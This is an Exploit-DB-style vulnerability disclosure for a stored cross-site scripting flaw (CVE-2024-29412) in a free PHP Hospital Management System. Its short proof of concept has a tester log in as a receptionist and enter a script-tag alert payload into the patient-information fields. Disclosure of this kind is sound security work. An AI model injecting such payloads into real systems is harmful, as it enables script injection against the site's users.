# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)# Google Dork: NA# Date: 28-03-2024# Exploit Author: Sandeep Vishwakarma# Vendor Homepage: https://code-projects.org# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/# Version: v1.0# Tested on: Windows 10# CVE : CVE-2024-29412# Description: Stored Cross Site Scripting vulnerability in
Hospital Management System - v1.0 allows an attacker to execute arbitrary
code via a crafted payload to the 'patient_id','first_name','middle_initial','last_name'" in/receptionist.php component.# POC:1. Go to the User Login page: "
http://localhost/HospitalManagementSystem-gh-pages/2. Login with"r1" ID which is redirected to "
http://localhost/HospitalManagementSystem-gh-pages/receptionist.php"
endpoint.3. In Patient information functionality add this payload
"><script>alert('1')</script>,inall parameter.4. click on submit.# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md
